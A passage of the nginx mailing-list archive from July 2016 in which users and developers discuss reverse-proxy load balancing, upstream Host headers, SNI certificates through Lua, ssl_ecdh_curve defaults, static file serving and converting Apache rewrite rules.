proxy_pass. Are you sure proxy_pass is defined in the >> server stanza and that it's inside an include stanza? >> >> Posting the code would be helpful if you can redact the sensitive >> information. >> >> On Tue, Jul 5, 2016 at 9:41 AM, Brian Pugh wrote: >> >>> Are you referring to the proxy pass declaration? If so I get an error >>> when I uncomment that line out saying "nginx: [emerg] "proxy_pass" >>> directive is not allowed here in /etc/nginx/conf.d/default.conf:40?" 
>>> >>> >>> >>> >>> ------------------------------ >>> *From:* nginx on behalf of Drew Turner < >>> drew at drewnturner.com> >>> *Sent:* Tuesday, July 5, 2016 9:33 AM >>> *To:* nginx at nginx.org >>> *Subject:* Re: does nginx forward requests to backend servers using >>> http or https? >>> >>> You define what you want it sent to the backend as. So if you use >>> http://backendserver it's http, if https://backendserver:443 - https. >>> >>> On Tue, Jul 5, 2016 at 9:26 AM, Brian Pugh wrote: >>> >>>> I am using the free version of nginx on RHEL 6.7. The version is : >>>> >>>> >>>> nginx-1.10.1-1.el6.ngx.x86_64 >>>> >>>> >>>> When using nginx as a load balancer I would like to know if nginx >>>> forwards requests to backend servers using http or https?? >>>> >>>> >>>> >>>> >>>> >>>> >>>> >>>> _______________________________________________ >>>> nginx mailing list >>>> nginx at nginx.org >>>> http://mailman.nginx.org/mailman/listinfo/nginx >>>> >>> >>> >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> >> >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From charles.orth at teamaol.com Tue Jul 5 21:00:03 2016 From: charles.orth at teamaol.com (Charles Orth) Date: Tue, 05 Jul 2016 17:00:03 -0400 Subject: How to leverage HTTP upstream features In-Reply-To: References: <59DDEEE5-3681-49E4-930E-F18FB560AFB8@here.com> <60A141E5-41D9-42D5-B3E1-38A63919FB5B@here.com> Message-ID: <577C1FD3.1040107@teamaol.com> Hi Gurus, I'm new to nginx... I would like to define upstream handler in HTTP without a HTTP server listener. 
From SMTP/POP3/IMAP I would like to use the upstream handler for my http endpoint. This requires http_upstream to initialize, create a request, hand the request off to upstream for processing, and finally have the HTTP upstream handler return the entire response to my handler. I haven't found any examples or patches where I can leverage HTTP upstream from the mail service's perspective. Does anyone have a suggestion or an example? Thanks Charles From project722 at gmail.com Tue Jul 5 21:04:48 2016 From: project722 at gmail.com (NdridCold .) Date: Tue, 5 Jul 2016 16:04:48 -0500 Subject: basic nginx setup help as load balancer In-Reply-To: <4C79A6BD1B674FCB933A438067B984E0@NeiRoze> References: <4C79A6BD1B674FCB933A438067B984E0@NeiRoze> Message-ID: Thank you. In my setup all 3 servers in the upstream block will answer requests for "myapplication.net". Knowing that, would you say the config I have is sufficient? On Tue, Jul 5, 2016 at 1:42 PM, Reinis Rozitis wrote: > But I am confused on a few concepts here. First of all, should my server >> name in the "upstream" directive be the same name in the "server_name" >> directive in the "server" stanza? Here is what I have so far: >> > > And to recap, should my server name in the "upstream" directive be the >> same name in the "server_name" directive in the "server" stanza? >> > > > It is not a requirement, but depending on how your backend servers are > configured (if they are name-based virtualhosts) you may need to specify the > correct Host header. > > > By default nginx sends whatever it is given in the proxy_pass directive. > > Taking your configuration for example: > > upstream myapplication.net { > server 1.net; > server 2.net; > server 3.net; > } > > location { > proxy_pass http://myapplication.net; > } > > > 1. On startup Nginx will resolve the 1.net .. 3.net hostnames > 2. It will send a request for 'myapplication.net' (Host) to whichever upstream > server IP it has chosen (not using the upstream hostnames).
It > also doesn't use server_name. > > If the backend has a name-based configuration and there is no > 'myapplication.net' virtualhost (or it isn't the default one) the whole > request will generally fail (not return what was expected). > > If that is the case you either need to configure the upstream block (which > for nginx is just a virtual name) and the proxy_pass to match your backend > configuration, or usually people just add an additional header: > > location { > proxy_pass http://myapplication.net; > proxy_set_header Host $host; > } > > This way nginx sends the actual hostname from the request to the backend. > > Of course you can also use $server_name (or any other variable > http://nginx.org/en/docs/varindex.html or even a static value) but usually > server_name is something like .domain.com (for wildcard matching) so it > may confuse the backend. > > rr > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From crohmann at netcologne.de Wed Jul 6 06:57:55 2016 From: crohmann at netcologne.de (Christian Rohmann) Date: Wed, 6 Jul 2016 08:57:55 +0200 Subject: SNI support for nginx In-Reply-To: <9af133d4fd296ba618c1962065af8102.NginxMailingListEnglish@forum.nginx.org> References: <9af133d4fd296ba618c1962065af8102.NginxMailingListEnglish@forum.nginx.org> Message-ID: <219dbf55-aba2-a73b-4ffb-ba63b36e18fb@netcologne.de> On 07/04/2016 12:31 PM, Sushma wrote: > Or is there a way, nginx will be able to dynamically figure out the cert to > be presented without it being explicitly mentioned via the directive > ssl_certificate? After some research: not statically by configuration. But using a bit of Lua could offer a way to make this happen.
Something like: https://litespeed.io/dynamic-tls-certificates-with-openresty-and-ssl_certificate_by_lua/ Regards Christian From pratyush at hostindya.com Wed Jul 6 04:54:03 2016 From: pratyush at hostindya.com (Pratyush Kumar) Date: Wed, 06 Jul 2016 10:24:03 +0530 Subject: basic nginx setup help as load balancer In-Reply-To: Message-ID: An HTML attachment was scrubbed... URL: From florian at bottledsoftware.de Wed Jul 6 07:15:59 2016 From: florian at bottledsoftware.de (Florian Reinhart) Date: Wed, 6 Jul 2016 09:15:59 +0200 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: <20160705181614.GT30781@mdounin.ru> References: <20160705132026.GH30781@mdounin.ru> <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> <20160705143948.GJ30781@mdounin.ru> <0084417C-DCEC-4581-99B1-30BDAEFCFF95@bottledsoftware.de> <20160705181614.GT30781@mdounin.ru> Message-ID: Hi Maxim! Thanks for investigating this! I thought ssl_ecdh_curve was only used to specify curves for ECDHE. Is there any way to know what curves "auto" will include on my system? -Florian > On 05 Jul 2016, at 20:16, Maxim Dounin wrote: > > Hello! > > On Tue, Jul 05, 2016 at 05:02:07PM +0200, Florian Reinhart wrote: > >> It is the same certificate on both servers and it is indeed a >> secp256r1 aka prime256v1 certificate. So does this mean I have >> to use prime256v1 for ssl_ecdh_curve with this certificate? It's >> still strange that it used to work before... > > Since version 1.11.0 nginx uses the new SSL_CTX_set1_curves_list() > interface if available to configure supported curves, instead of > the previously used EC_KEY_new_by_curve_name()/SSL_CTX_set_tmp_ecdh(). > This new interface is generally better as it allows configuring > multiple curves. > > I've just tested, and it looks like this new interface is also > more strict. With the previous interface it was possible to use any > certificate regardless of the ssl_ecdh_curve setting, and that's > why it worked for you in older versions.
The new interface does > not allow to use curves which are not listed at all, including > certificates using these curves. > > Solution would be to list all curves you want to use, including > curves used by certificates, e.g.: > > ssl_ecdh_curve secp384r1:prime256v1; > > Or, better yet, just leave the default ("auto"), it will allow > most common curves as supported by OpenSSL. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From kurt at x64architecture.com Wed Jul 6 09:32:59 2016 From: kurt at x64architecture.com (Kurt Cancemi) Date: Wed, 6 Jul 2016 05:32:59 -0400 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: References: <20160705132026.GH30781@mdounin.ru> <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> <20160705143948.GJ30781@mdounin.ru> <0084417C-DCEC-4581-99B1-30BDAEFCFF95@bottledsoftware.de> <20160705181614.GT30781@mdounin.ru> Message-ID: Hello, The following are in auto: secp256r1 secp521r1 brainpool512r1 brainpoolP384r1 secp384r1 brainpoolP256r1 secp256k1 If not configured with OPENSSL_NO_EC2M sect571r1 sect571k1 sect409k1 sect409r1 sect283k1 sect283r1 #endif From OpenSSL source: https://github.com/openssl/openssl/blob/OpenSSL_1_0_2-stable/ssl/t1_lib.c#L266 Kurt Cancemi https://www.x64architecture.com > On Jul 6, 2016, at 03:15, Florian Reinhart wrote: > > Hi Maxim! > > Thanks for investigating this! I thought ssl_ecdh_curve was only used to specific curves for ECDHE. > > Is there any way to know what curves "auto" will include on my system? > > ?Florian From nginx-forum at forum.nginx.org Wed Jul 6 10:34:53 2016 From: nginx-forum at forum.nginx.org (NemoPang) Date: Wed, 06 Jul 2016 06:34:53 -0400 Subject: Erro 499 help Message-ID: My web architecture is: nginx(reverse proxy) -> nginx + php-fpm It's normal when i curl it on pc(linux shell and pc Browser). 
This is the nginx(reverse proxy) access.log: 117.136.40.0 - - [06/Jul/2016:17:38:31 +0800] "GET /a.php HTTP/1.1" 200 66 ....... It's not normal when I access it on my phone(android Browser). But it will be normal sometimes. 117.136.40.0 - - [06/Jul/2016:17:40:09 +0800] "GET /a.php HTTP/1.1" 499 0 ....... 117.136.40.0 - - [06/Jul/2016:17:40:18 +0800] "GET /a.php HTTP/1.1" 200 66 ...... If I set "proxy_ignore_client_abort on" in nginx's config, the access_log will be this: 117.136.40.0 - - [06/Jul/2016:17:40:18 +0800] "GET /a.php HTTP/1.1" 200 0 ...... Please help me! Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268108,268108#msg-268108 From r at roze.lv Wed Jul 6 10:56:11 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 6 Jul 2016 13:56:11 +0300 Subject: basic nginx setup help as load balancer In-Reply-To: References: <4C79A6BD1B674FCB933A438067B984E0@NeiRoze> Message-ID: <17EB8B77C0E64A3CB2C3781443B4A784@MasterPC> > Thank you. In my setup all 3 servers in the upstream block will answer > requests for "myapplication.net" . Knowing that, would you say my config I > have is sufficient? It should be, yes. rr From r at roze.lv Wed Jul 6 11:02:24 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 6 Jul 2016 14:02:24 +0300 Subject: basic nginx setup help as load balancer In-Reply-To: References: Message-ID: > I'm new to servers and proxies, > But don't you think running both nginx and Apache on port 80 of same machine will cause one of those to fail to start. > In my opinion backend should be on different IP:port combination. > Please correct me if I'm wrong. It is correct (though you can work around it by having the backend (apache) listen only on the 127.0.0.1 interface and nginx as the frontend on the real IP). But to me the initial poster's configuration excerpt looked like it had just generic comments not representing the actual case. rr -------------- next part -------------- An HTML attachment was scrubbed...
URL: From mdounin at mdounin.ru Wed Jul 6 12:33:53 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 6 Jul 2016 15:33:53 +0300 Subject: How to leverage HTTP upstream features In-Reply-To: <577C1FD3.1040107@teamaol.com> References: <59DDEEE5-3681-49E4-930E-F18FB560AFB8@here.com> <60A141E5-41D9-42D5-B3E1-38A63919FB5B@here.com> <577C1FD3.1040107@teamaol.com> Message-ID: <20160706123353.GU30781@mdounin.ru> Hello! On Tue, Jul 05, 2016 at 05:00:03PM -0400, Charles Orth wrote: > I'm new to nginx... > I would like to define upstream handler in HTTP without a HTTP server > listener. From SMTP/POP3/IMAP I would like > to use the upstream handler for my http endpoint. Thus requiring > http_upstream initialize, create a request, hand the request off to upstream > for processing and finally having HTTP upstream handler return the entire > response to my handler. > I haven't found any examples or patches where I can leverage HTTP upstream > from Mail service perspective. > Does anyone have a suggestion or an example? This is not something you can do. Mail and http are different modules, and you can't use http module features in the mail module. If you want to use upstreams in mail, you have to reimplement them there. Practical solution is to use one address in mail (e.g., 127.0.0.1:8080) and additionally balance requests using http reverse proxy, e.g.: mail { auth_http 127.0.0.1/mailauth; ... } http { upstream backends { server 127.0.0.2:8080; ... 
} server { listen 8080; location /mailauth { proxy_pass http://backends; } } } -- Maxim Dounin http://nginx.org/ From kerozin.joe at gmail.com Wed Jul 6 12:38:58 2016 From: kerozin.joe at gmail.com (=?UTF-8?Q?Lantos_Istv=C3=A1n?=) Date: Wed, 6 Jul 2016 14:38:58 +0200 Subject: Nginx static file serving - Some files are 404, some not Message-ID: I have the following server configuration block:

server {
    # Running port
    listen 80;        # ipv4
    listen [::]:80;   # ipv6
    server_name localhost;
    root /var/www/html;

    # Proxying the connections
    location / {
        proxy_pass http://app;
        proxy_redirect off;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Host $server_name;
    }

    location ~ ^/(fonts/|gallery/|images/|javascripts/|stylesheets/|ajax_info\.txt|apple-touch-icon\.png|browserconfig\.xml|crossdomain\.xml|favicon\.ico|robots\.txt|tile-wide\.png|tile\.png) {
        root /var/www/html/public;
        access_log off;
        expires max;
    }

    error_page 401 403 404 /404.html;
    error_page 500 502 503 504 /50x.html;
}

I want to serve my static files with Nginx alongside my Node/Express app. I don't want to refactor every single route in my app, which is why I want to serve all these static files under the / URL path. The problem is that some files cannot be located on disk although they exist, for example /images/art/lindon.png.
This is a docker-compose stack and nginx built from source: https://github.com/DJviolin/lantosistvan/blob/be8e49e2302793d37ed3bfdec865f7086e579197/docker/nginx/Dockerfile The error message that I got for a missing file: lantosistvan_nginx | 2016/07/06 14:24:42 [error] 6#6: *3 open() "/var/www/html/public/images/art/lindon.png" failed (2: No such file or directory), client: 10.0.2.2, server: localhost, request: "GET /images/art/lindon.png HTTP/1.1", host: "127.0.0.1", referrer: "http://127.0.0.1/hu/blog/mariya-balazs" Is there any better way to serve static files for the / URL without blocking location / {}? Thank You for your help! István -------------- next part -------------- An HTML attachment was scrubbed... URL: From kerozin.joe at gmail.com Wed Jul 6 13:44:49 2016 From: kerozin.joe at gmail.com (=?UTF-8?Q?Lantos_Istv=C3=A1n?=) Date: Wed, 6 Jul 2016 15:44:49 +0200 Subject: Nginx static file serving - Some files are 404, some not In-Reply-To: References: Message-ID: Sorry, the parent folder, /images/art, was uncommented in .gitignore; that's why it didn't get uploaded to my repo. Problem solved. Still, is there any method to share static files? Something like exposing the public folder at the / URL, but without blocking the route?
2016-07-06 14:38 GMT+02:00 Lantos Istv?n : > I have the following server configuration block: > > >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> *server { # Running port listen 80; # ipv4 listen >> [::]:80; # ipv6 server_name localhost; root >> /var/www/html; # Proxying the connections connections location / >> { proxy_pass http://app ; >> proxy_redirect off; proxy_set_header Host $host; >> proxy_set_header X-Real-IP $remote_addr; proxy_set_header >> X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header >> X-Forwarded-Host $server_name; } location ~ >> ^/(fonts/|gallery/|images/|javascripts/|stylesheets/|ajax_info\.txt|apple-touch-icon\.png|browserconfig\.xml|crossdomain\.xml|favicon\.ico|robots\.txt|tile-wide\.png|tile\.png) >> { root /var/www/html/public; access_log off; expires max; >> } error_page 401 403 404 /404.html; error_page 500 502 503 504 >> /50x.html;}* >> > > I want to server my static files with Nginx to my Node/Express app. I not > want to re-factore every single route in my app, that's why i want to > server all these static files into / URL path. > > The problem is some files cannot be located on the disk, although they > existing, for example */images/art/lindon.png*. > > This is a docker-compose stack and nginx built from source: > > https://github.com/DJviolin/lantosistvan/blob/be8e49e2302793d37ed3bfdec865f7086e579197/docker/nginx/Dockerfile > > The error message that I got for a missing file: > > *lantosistvan_nginx | 2016/07/06 14:24:42 [error] 6#6: *3 open() >> "/var/www/html/public/images/art/lindon.png" failed (2: No such file or >> directory), client: 10.0.2.2, server: localhost, request: "GET >> /images/art/lindon.png HTTP/1.1", host: "127.0.0.1", referrer: >> "http://127.0.0.1/hu/blog/mariya-balazs >> "* >> > > Is there any better way to server static files for the / URL without > blocking* location / {}*? > > Thank You for your help! 
> > Istv?n > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Wed Jul 6 16:08:19 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 6 Jul 2016 19:08:19 +0300 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: References: <20160705132026.GH30781@mdounin.ru> <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> <20160705143948.GJ30781@mdounin.ru> <0084417C-DCEC-4581-99B1-30BDAEFCFF95@bottledsoftware.de> <20160705181614.GT30781@mdounin.ru> Message-ID: <20160706160819.GX30781@mdounin.ru> Hello! On Wed, Jul 06, 2016 at 09:15:59AM +0200, Florian Reinhart wrote: > Is there any way to know what curves "auto" will include on my > system? This is not currently possible, AFAIK, and depends on the OpenSSL library used. Here is a short summary for varions OpenSSL version I've previously looked into: - OpenSSL 1.0.2, 1.0.2a: all curves supported, strongest first. Full list is available via "openssl ecparam -list_curves". - OpenSSL 1.0.2b ... 1.0.2h: limited default list with at least 256 bits, prime256v1 (aka P-256) first. List in OpenSSL 1.0.2g is as follows: P-256:P-521:brainpoolP512r1:brainpoolP384r1:P-384:brainpoolP256r1:secp256k1:B-571:K-571:K-409:B-409:K-283:B-283 - Upcoming OpenSSL 1.1.0 uses X25519:P-256:P-521:P-384 (aka X25519:secp256r1:secp521r1:secp384r1). -- Maxim Dounin http://nginx.org/ From reallfqq-nginx at yahoo.fr Wed Jul 6 16:50:14 2016 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Wed, 6 Jul 2016 18:50:14 +0200 Subject: Nginx static file serving - Some files are 404, some not In-Reply-To: References: Message-ID: location / only means 'a location which starts with /'. Basically, this catches every single request, and is the least specific way (lowest precedence ever) to do so. When choosing the most suitable location block, nginx will most of the time use a more specific one. That is why this is called 'default location'. 
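The precedence B.R. describes can be sketched as a minimal config (all paths purely illustrative):

```nginx
server {
    listen 80;

    location = /         { }  # exact match: selected immediately for "/"
    location ^~ /static/ { }  # prefix match that suppresses regex checking
    location ~ \.php$    { }  # regex: preferred over plain prefix matches
    location /docs/      { }  # plain prefix: longest match is remembered
    location /           { }  # 'default location': matches every request
}
```

nginx selects an exact (`=`) match immediately; otherwise it remembers the longest matching prefix, uses it directly if it is marked `^~`, and consults the regex locations only before falling back to that remembered prefix.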
One way I understand your question: If you want to have a specific behavior for the '/' path, you could use location = / which matches only this *exact* path and has the highest precedence, as a match with the requested path makes this block immediately selected. Another way: If you want to first browse your filesystem and fall back (in case no file matches) to proxying the request to backends, that is not what your current configuraiton file tells nginx to do. You would need something like: location / { try_files $uri $uri/ @fallback; autoindex on; } location @fallback { } --- *B. R.* On Wed, Jul 6, 2016 at 3:44 PM, Lantos Istv?n wrote: > Sorry, the parent folder, /images/art was uncommented in .gitignore, > that's why didn't uploaded into my repo. Problem solved. > > Still, is there any method to share static files? Something like expose > the public folder into / URL, but without blocking the route? > > 2016-07-06 14:38 GMT+02:00 Lantos Istv?n : > >> I have the following server configuration block: >> >> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> *server { # Running port listen 80; # ipv4 listen >>> [::]:80; # ipv6 server_name localhost; root >>> /var/www/html; # Proxying the connections connections location / >>> { proxy_pass http://app ; >>> proxy_redirect off; proxy_set_header Host $host; >>> proxy_set_header X-Real-IP $remote_addr; proxy_set_header >>> X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header >>> X-Forwarded-Host $server_name; } location ~ >>> ^/(fonts/|gallery/|images/|javascripts/|stylesheets/|ajax_info\.txt|apple-touch-icon\.png|browserconfig\.xml|crossdomain\.xml|favicon\.ico|robots\.txt|tile-wide\.png|tile\.png) >>> { root /var/www/html/public; access_log off; expires max; >>> } error_page 401 403 404 /404.html; error_page 500 502 503 504 >>> /50x.html;}* >>> >> >> I want to server my static files with Nginx to my Node/Express app. 
I not >> want to re-factore every single route in my app, that's why i want to >> server all these static files into / URL path. >> >> The problem is some files cannot be located on the disk, although they >> existing, for example */images/art/lindon.png*. >> >> This is a docker-compose stack and nginx built from source: >> >> https://github.com/DJviolin/lantosistvan/blob/be8e49e2302793d37ed3bfdec865f7086e579197/docker/nginx/Dockerfile >> >> The error message that I got for a missing file: >> >> *lantosistvan_nginx | 2016/07/06 14:24:42 [error] 6#6: *3 open() >>> "/var/www/html/public/images/art/lindon.png" failed (2: No such file or >>> directory), client: 10.0.2.2, server: localhost, request: "GET >>> /images/art/lindon.png HTTP/1.1", host: "127.0.0.1", referrer: >>> "http://127.0.0.1/hu/blog/mariya-balazs >>> "* >>> >> >> Is there any better way to server static files for the / URL without >> blocking* location / {}*? >> >> Thank You for your help! >> >> Istv?n >> >> > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From r1ch+nginx at teamliquid.net Wed Jul 6 17:02:25 2016 From: r1ch+nginx at teamliquid.net (Richard Stanway) Date: Wed, 6 Jul 2016 19:02:25 +0200 Subject: Nginx static file serving - Some files are 404, some not In-Reply-To: References: Message-ID: Check out try_files. http://nginx.org/en/docs/http/ngx_http_core_module.html#try_files On Wed, Jul 6, 2016 at 3:44 PM, Lantos Istv?n wrote: > Sorry, the parent folder, /images/art was uncommented in .gitignore, > that's why didn't uploaded into my repo. Problem solved. > > Still, is there any method to share static files? Something like expose > the public folder into / URL, but without blocking the route? 
> > 2016-07-06 14:38 GMT+02:00 Lantos Istv?n : > >> I have the following server configuration block: >> >> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> >>> *server { # Running port listen 80; # ipv4 listen >>> [::]:80; # ipv6 server_name localhost; root >>> /var/www/html; # Proxying the connections connections location / >>> { proxy_pass http://app ; >>> proxy_redirect off; proxy_set_header Host $host; >>> proxy_set_header X-Real-IP $remote_addr; proxy_set_header >>> X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header >>> X-Forwarded-Host $server_name; } location ~ >>> ^/(fonts/|gallery/|images/|javascripts/|stylesheets/|ajax_info\.txt|apple-touch-icon\.png|browserconfig\.xml|crossdomain\.xml|favicon\.ico|robots\.txt|tile-wide\.png|tile\.png) >>> { root /var/www/html/public; access_log off; expires max; >>> } error_page 401 403 404 /404.html; error_page 500 502 503 504 >>> /50x.html;}* >>> >> >> I want to server my static files with Nginx to my Node/Express app. I not >> want to re-factore every single route in my app, that's why i want to >> server all these static files into / URL path. >> >> The problem is some files cannot be located on the disk, although they >> existing, for example */images/art/lindon.png*. >> >> This is a docker-compose stack and nginx built from source: >> >> https://github.com/DJviolin/lantosistvan/blob/be8e49e2302793d37ed3bfdec865f7086e579197/docker/nginx/Dockerfile >> >> The error message that I got for a missing file: >> >> *lantosistvan_nginx | 2016/07/06 14:24:42 [error] 6#6: *3 open() >>> "/var/www/html/public/images/art/lindon.png" failed (2: No such file or >>> directory), client: 10.0.2.2, server: localhost, request: "GET >>> /images/art/lindon.png HTTP/1.1", host: "127.0.0.1", referrer: >>> "http://127.0.0.1/hu/blog/mariya-balazs >>> "* >>> >> >> Is there any better way to server static files for the / URL without >> blocking* location / {}*? 
>> >> Thank You for your help! >> >> Istv?n >> >> > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From agentzh at gmail.com Thu Jul 7 05:55:01 2016 From: agentzh at gmail.com (Yichun Zhang (agentzh)) Date: Wed, 6 Jul 2016 22:55:01 -0700 Subject: SNI support for nginx In-Reply-To: <219dbf55-aba2-a73b-4ffb-ba63b36e18fb@netcologne.de> References: <9af133d4fd296ba618c1962065af8102.NginxMailingListEnglish@forum.nginx.org> <219dbf55-aba2-a73b-4ffb-ba63b36e18fb@netcologne.de> Message-ID: Hello! On Tue, Jul 5, 2016 at 11:57 PM, Christian Rohmann wrote: > On 07/04/2016 12:31 PM, Sushma wrote: >> Or is there a way, nginx will be able to dynamically figure out the cert to >> be presented without it being explicitly mentioned via the directive >> ssl_certificate? > > After some research not statically by configuration. But using a bit of > lua could offer a way to maybe make this happen. Something like: > https://litespeed.io/dynamic-tls-certificates-with-openresty-and-ssl_certificate_by_lua/ > Aye. CloudFlare, for example, has been using ssl_certificate_by_lua* with the ngx.ssl Lua module to lazily load a *lot* of SSL certificates and private keys from remote services (via nonblocking IO) only on demand in its global SSL gateway network for long. With lazy loading and local caching (via lua_shared_dict and/or lua-resty-lrucache), the flexibility and performance can be both excellent. You can not only look up your SSL credentials via SNI, but also via the server IP address the client is accessing (for older SSL clients that do not support TLS SNI). 
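A rough sketch of the lazy-loading pattern described above, using ssl_certificate_by_lua_block and the ngx.ssl module (fetch_cert_for is a hypothetical lookup function; caching via lua_shared_dict is omitted for brevity):

```nginx
server {
    listen 443 ssl;
    server_name _;

    # A placeholder certificate is still required at startup;
    # it is replaced per-handshake by the Lua handler below.
    ssl_certificate     /etc/nginx/fallback.crt;
    ssl_certificate_key /etc/nginx/fallback.key;

    ssl_certificate_by_lua_block {
        local ssl = require "ngx.ssl"

        local name = ssl.server_name()  -- SNI name, may be nil
        local cert_pem, key_pem = fetch_cert_for(name)  -- hypothetical helper
        if not cert_pem then
            return  -- fall back to the placeholder certificate
        end

        ssl.clear_certs()
        ssl.set_cert(ssl.parse_pem_cert(cert_pem))
        ssl.set_priv_key(ssl.parse_pem_priv_key(key_pem))
    }
}
```

Error handling (each ngx.ssl call also returns an error string) is left out to keep the sketch short.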
The formal documentation for this feature is: https://github.com/openresty/lua-nginx-module/#ssl_certificate_by_lua_block https://github.com/openresty/lua-resty-core/blob/master/lib/ngx/ssl.md#readme Even dynamic OCSP stapling is supported ;) The easiest way to get everything set up is to use the OpenResty bundle, BTW: http://openresty.org/en/ Have fun! Best regards, -agentzh From charles.orth at teamaol.com Thu Jul 7 12:42:55 2016 From: charles.orth at teamaol.com (Charles Orth) Date: Thu, 07 Jul 2016 08:42:55 -0400 Subject: How to leverage HTTP upstream features In-Reply-To: <20160706123353.GU30781@mdounin.ru> References: <59DDEEE5-3681-49E4-930E-F18FB560AFB8@here.com> <60A141E5-41D9-42D5-B3E1-38A63919FB5B@here.com> <577C1FD3.1040107@teamaol.com> <20160706123353.GU30781@mdounin.ru> Message-ID: <577E4E4F.3000806@teamaol.com> Thanks Maxim, The loopback feature you described is the workaround we're using. However, for the new service I'm attempting to implement it is costly on several fronts. My impression that upstream would have to be reimplemented is what I was suspecting all along. Thanks Maxim Dounin wrote: > Hello! > > On Tue, Jul 05, 2016 at 05:00:03PM -0400, Charles Orth wrote: > > >> I'm new to nginx... >> I would like to define upstream handler in HTTP without a HTTP server >> listener. From SMTP/POP3/IMAP I would like >> to use the upstream handler for my http endpoint. Thus requiring >> http_upstream initialize, create a request, hand the request off to upstream >> for processing and finally having HTTP upstream handler return the entire >> response to my handler. >> I haven't found any examples or patches where I can leverage HTTP upstream >> from Mail service perspective. >> Does anyone have a suggestion or an example? > > This is not something you can do. Mail and http are different > modules, and you can't use http module features in the mail > module. If you want to use upstreams in mail, you have to > reimplement them there.
> > Practical solution is to use one address in mail (e.g., > 127.0.0.1:8080) and additionally balance requests using http > reverse proxy, e.g.: > > mail { > auth_http 127.0.0.1/mailauth; > ... > } > > http { > upstream backends { > server 127.0.0.2:8080; > ... > } > > server { > listen 8080; > > location /mailauth { > proxy_pass http://backends; > } > } > } > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From daniel at linux-nerd.de Thu Jul 7 16:49:21 2016 From: daniel at linux-nerd.de (Daniel) Date: Thu, 7 Jul 2016 18:49:21 +0200 Subject: Rewrite Rules from apache Message-ID: <2183559E-5AA9-4485-899C-465BDDE364F4@linux-nerd.de> Hi Everyone, i try to convert some rules from apache htaccess to nginx. This is my htaccess Rule: RewriteCond %{DOCUMENT_ROOT}/$3 -f RewriteRule ^(.*?)/(.*?)/(.*)$ /$3 I tried these options but it seems not working: if (-f $document_root/$3){ set $rule_0 1$rule_0; } if ($rule_0 = "1"){ rewrite ^/(.*?)/(.*?)/(.*)$ /$3; } Anyone have a good idea? Cheers Daniel From pratyush at hostindya.com Thu Jul 7 17:19:38 2016 From: pratyush at hostindya.com (pratyush at hostindya.com) Date: Thu, 07 Jul 2016 17:19:38 +0000 Subject: Rewrite Rules from apache In-Reply-To: <2183559E-5AA9-4485-899C-465BDDE364F4@linux-nerd.de> References: <2183559E-5AA9-4485-899C-465BDDE364F4@linux-nerd.de> Message-ID: <8550241a7f7572a29f6ad1c64ac0c535@hostindya.com> July 7 2016 10:19 PM, "Daniel" wrote: > Hi Everyone, > > i try to convert some rules from apache htaccess to nginx. > > This is my htaccess Rule: > > RewriteCond %{DOCUMENT_ROOT}/$3 -f > RewriteRule ^(.*?)/(.*?)/(.*)$ /$3 > > I tried these options but it seems not working: > > if (-f $document_root/$3){ > set $rule_0 1$rule_0; > } > if ($rule_0 = "1"){ > rewrite ^/(.*?)/(.*?)/(.*)$ /$3; > } > > Anyone have a good idea? 
>
> Cheers
>
> Daniel
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

how about

location ~ ^/(.*?)/(.*?)/(.*)$ {
    try_files /$3 $uri =404;
}

From daniel at linux-nerd.de Thu Jul 7 17:26:36 2016
From: daniel at linux-nerd.de (Daniel)
Date: Thu, 7 Jul 2016 19:26:36 +0200
Subject: Rewrite Rules from apache
In-Reply-To: <8550241a7f7572a29f6ad1c64ac0c535@hostindya.com>
References: <2183559E-5AA9-4485-899C-465BDDE364F4@linux-nerd.de> <8550241a7f7572a29f6ad1c64ac0c535@hostindya.com>
Message-ID:

Same issue. All images, CSS files and so on are not loaded :(

> On 07.07.2016 at 19:19, pratyush at hostindya.com wrote:
>
> July 7 2016 10:19 PM, "Daniel" wrote:
>> Hi Everyone,
>>
>> i try to convert some rules from apache htaccess to nginx.
>>
>> This is my htaccess Rule:
>>
